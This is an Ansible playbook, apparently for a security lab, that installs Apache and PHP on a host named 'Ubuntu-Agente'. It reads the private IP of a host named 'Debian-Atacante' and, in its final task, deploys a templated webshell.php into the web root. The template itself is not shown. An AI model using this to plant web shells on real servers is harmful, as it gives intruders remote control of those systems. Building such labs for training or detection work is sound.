---
- name: Instalar apache
  hosts: Ubuntu-Agente
  gather_facts: false
  become: true
  vars:
    host_atacante: Debian-Atacante
  tasks:
    - name: Esperar a que la conexión SSH esté disponible
      wait_for_connection:
        delay: 0
        timeout: 60
  
    - name: Hacer apt update
      apt:
        update_cache: true

    - name: Instalar apache
      apt:
        name: apache2
        state: present

    - name: Iniciar apache
      service:
        name: apache2
        state: started

    - name: Instalar PHP 8.3 sin los paquetes remocendados
      apt:
        name: php8.3
        state: present
        install_recommends: false

    - name: Recopilar datos de Debian-Atacante
      setup:
      delegate_to: "{{ host_atacante }}"
      run_once: true

    - name: Desplegar webshell.php
      set_fact:
        ip: "{{ hostvars[host_atacante].private_ip }}"
        delegate_to: localhost

    - name: Copy webshell.php to remote host
      template:
        src: ./scripts_ansible/templates/webshell.php.j2
        dest: /var/www/html/webshell.php
        owner: www-data
        group: www-data
        mode: '0644'
